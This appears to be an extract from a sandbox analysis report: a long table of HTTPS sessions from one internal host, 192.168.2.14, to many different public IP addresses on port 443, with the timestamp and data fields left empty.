                                      17431192.168.2.143948687.76.209.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17432192.168.2.1440042187.91.210.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17433192.168.2.1459518177.165.129.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17434192.168.2.143807297.157.88.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17435192.168.2.1446644185.26.45.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17436192.168.2.145052074.187.58.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17437192.168.2.1447678221.200.207.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17438192.168.2.1449214160.146.87.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17439192.168.2.1452830153.250.3.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17440192.168.2.1434432212.222.221.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17441192.168.2.143603837.192.78.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17442192.168.2.144368294.134.79.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17443192.168.2.144982282.20.54.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17444192.168.2.143322265.96.93.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17445192.168.2.1444494213.121.155.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17446192.168.2.1440880174.117.137.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17447192.168.2.145109072.46.204.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17448192.168.2.1455156206.214.219.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17449192.168.2.1438980128.240.14.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17450192.168.2.144844840.154.253.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17451192.168.2.1458474139.82.119.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17452192.168.2.1445798117.128.33.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17453192.168.2.143919284.153.10.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17454192.168.2.1433888161.139.21.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17455192.168.2.1444962131.127.215.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17456192.168.2.1459752219.254.58.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17457192.168.2.143934845.41.245.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17458192.168.2.143522052.26.115.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17459192.168.2.145344242.171.74.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17460192.168.2.14514541.196.121.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17461192.168.2.144827281.11.218.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17462192.168.2.1435730140.153.82.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17463192.168.2.1444960191.107.146.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17464192.168.2.1442614166.50.144.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17465192.168.2.14540444.181.118.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17466192.168.2.143588472.1.72.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17467192.168.2.1449686108.97.91.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17468192.168.2.1459090151.18.183.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17469192.168.2.1445666181.187.253.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17470192.168.2.143499824.201.118.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17471192.168.2.1453194150.206.0.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17472192.168.2.14462525.141.233.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17473192.168.2.144787854.193.134.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17474192.168.2.144570857.29.145.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17475192.168.2.144112451.26.128.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17476192.168.2.144242077.51.175.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17477192.168.2.14403321.216.22.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17478192.168.2.1440008213.95.128.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17479192.168.2.145455497.144.138.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17480192.168.2.1459792126.161.82.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17481192.168.2.1441546139.216.113.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17482192.168.2.1447692103.83.249.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17483192.168.2.1450396147.87.235.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17484192.168.2.1444236155.57.184.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17485192.168.2.144521027.55.170.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17486192.168.2.1434724113.37.238.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17487192.168.2.143954266.149.191.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17488192.168.2.145414036.96.1.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17489192.168.2.1459596121.211.190.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17490192.168.2.144158048.236.10.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17491192.168.2.14459422.115.245.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17492192.168.2.1438036129.243.163.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17493192.168.2.144397487.49.188.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17494192.168.2.1433788116.106.26.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17495192.168.2.143489446.171.162.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17496192.168.2.1448202158.206.38.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17497192.168.2.144214067.60.67.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17498192.168.2.1436560111.175.168.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17499192.168.2.1438986184.52.81.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17500192.168.2.144337214.79.151.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17501192.168.2.1438732134.167.227.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17502192.168.2.1436106198.72.6.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17503192.168.2.1460980128.135.239.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17504192.168.2.143458625.219.164.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17505192.168.2.1437914105.244.44.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17506192.168.2.1434780189.232.146.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17507192.168.2.1439864167.4.241.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17508192.168.2.1441454192.86.196.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17509192.168.2.1457378105.127.13.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17510192.168.2.1453100182.223.32.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17511192.168.2.1436658189.223.167.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17512192.168.2.145799078.142.10.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17513192.168.2.1433438154.53.233.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17514192.168.2.144723492.133.140.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17515192.168.2.1449786100.54.16.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17516192.168.2.14548524.222.201.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17517192.168.2.145160672.86.246.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17518192.168.2.144329618.15.132.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17519192.168.2.1437910218.254.103.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17520192.168.2.1451708115.33.67.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17521192.168.2.1448140137.141.27.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17522192.168.2.1438088152.171.88.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17523192.168.2.144484223.123.25.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17524192.168.2.1448484178.98.211.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17525192.168.2.1439242170.79.128.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17526192.168.2.144994464.125.73.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17527192.168.2.144300424.130.137.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17528192.168.2.143426041.45.205.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17529192.168.2.1444444175.14.84.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17530192.168.2.1436598105.222.76.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17531192.168.2.1457384220.242.130.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17532192.168.2.1433806222.144.134.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17533192.168.2.1432826191.208.127.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17534192.168.2.144520485.202.238.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17535192.168.2.1436602143.153.251.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17536192.168.2.1438488173.148.230.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17537192.168.2.1459718219.204.50.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17538192.168.2.14452824.219.180.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17539192.168.2.1439664172.81.181.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17540192.168.2.1460820211.209.14.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17541192.168.2.1437434175.198.12.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17542192.168.2.1439688221.143.156.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17543192.168.2.1452126189.28.234.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17544192.168.2.143905435.165.75.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17545192.168.2.1442780163.202.230.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17546192.168.2.1448196133.122.17.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17547192.168.2.1442158176.220.153.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17548192.168.2.1456392163.62.81.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17549192.168.2.1446658188.66.2.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17550192.168.2.145336060.221.32.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17551192.168.2.1435112223.232.226.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17552192.168.2.143969647.110.86.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17553192.168.2.1439924187.101.99.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17554192.168.2.1451364192.155.205.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17555192.168.2.1450510150.180.207.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17556192.168.2.144251254.148.168.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17557192.168.2.1436168119.62.159.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17558192.168.2.145917299.187.213.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17559192.168.2.1445596188.170.164.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17560192.168.2.1457714140.244.226.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17561192.168.2.1444156124.113.162.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17562192.168.2.1443874132.38.177.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17563192.168.2.143580449.94.220.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17564192.168.2.1453842120.206.255.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17565192.168.2.1454264150.185.152.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17566192.168.2.1444406207.221.209.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17567192.168.2.1441310142.67.30.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17568192.168.2.144027467.29.251.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17569192.168.2.1453618121.131.64.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17570192.168.2.143356851.9.216.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17571192.168.2.1436556198.51.200.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17572192.168.2.146068899.145.175.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17573192.168.2.1457236155.18.74.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17574192.168.2.144568834.76.219.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17575192.168.2.144921414.126.220.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17576192.168.2.1437790221.152.123.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17577192.168.2.1441634159.116.112.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17578192.168.2.1441246147.4.79.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17579192.168.2.145319631.4.137.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17580192.168.2.1459168136.239.110.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17581192.168.2.1437932188.225.155.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17582192.168.2.143892251.48.7.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17583192.168.2.146094092.74.185.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17584192.168.2.1450840218.86.220.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17585192.168.2.145761639.60.202.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17586192.168.2.145905078.153.178.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17587192.168.2.1433222145.15.41.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17588192.168.2.143814277.124.101.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17589192.168.2.1446380117.102.48.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17590192.168.2.1457490207.192.228.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17591192.168.2.1436292196.149.111.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17592192.168.2.1446206132.33.20.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17593192.168.2.1437352108.95.201.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17594192.168.2.145860062.183.178.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17595192.168.2.143288014.98.216.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17596192.168.2.1457964148.174.97.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17597192.168.2.1453890164.82.50.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17598192.168.2.1434710205.226.216.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17599192.168.2.1455894112.248.39.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17600192.168.2.1445112193.226.99.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17601192.168.2.1451700170.221.147.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17602192.168.2.144696891.81.1.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17603192.168.2.1433594194.79.18.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17604192.168.2.1443810126.193.150.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17605192.168.2.1442332133.217.95.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17606192.168.2.1441972217.9.187.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17607192.168.2.1460060142.235.232.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17608192.168.2.143705077.35.197.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17609192.168.2.1455260114.73.78.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17610192.168.2.1446910142.108.60.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17611192.168.2.1458960166.160.150.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17612192.168.2.1449744176.70.59.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17613192.168.2.145770248.192.109.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17614192.168.2.143327262.112.215.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17615192.168.2.145060891.206.186.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17616192.168.2.144347671.238.53.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17617192.168.2.1445500221.67.91.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17618192.168.2.1441428208.140.255.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17619192.168.2.145136261.103.50.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17620192.168.2.1447836126.75.82.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17621192.168.2.1436832169.250.145.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17622192.168.2.1451602151.78.134.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17623192.168.2.144395670.196.61.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17624192.168.2.1460674130.251.202.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17625192.168.2.145383252.89.52.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17626192.168.2.1447320183.81.175.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17627192.168.2.1439490182.84.120.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17628192.168.2.1457750145.224.74.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17629192.168.2.145319066.31.83.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17630192.168.2.1436722146.138.193.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17631192.168.2.144104472.207.120.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17632192.168.2.1447786197.23.48.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17633192.168.2.145555862.103.138.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17634192.168.2.144989099.19.26.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17635192.168.2.144157071.181.32.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17636192.168.2.1443992148.23.158.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17637192.168.2.145266438.245.7.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17638192.168.2.1460576162.61.242.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17639192.168.2.1452832165.186.74.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17640192.168.2.145733278.53.124.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17641192.168.2.1447404188.252.193.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17642192.168.2.1434820169.137.199.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17643192.168.2.1447892175.226.95.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17644192.168.2.1449648175.239.28.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17645192.168.2.1455998211.221.21.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17646192.168.2.145350679.99.139.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17647192.168.2.143837427.219.194.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17648192.168.2.1456014103.25.61.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17649192.168.2.1444700180.169.222.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17650192.168.2.1439376108.56.10.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17651192.168.2.143811676.115.228.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17652192.168.2.145332867.7.245.97443
                                      TimestampBytes transferredDirectionData


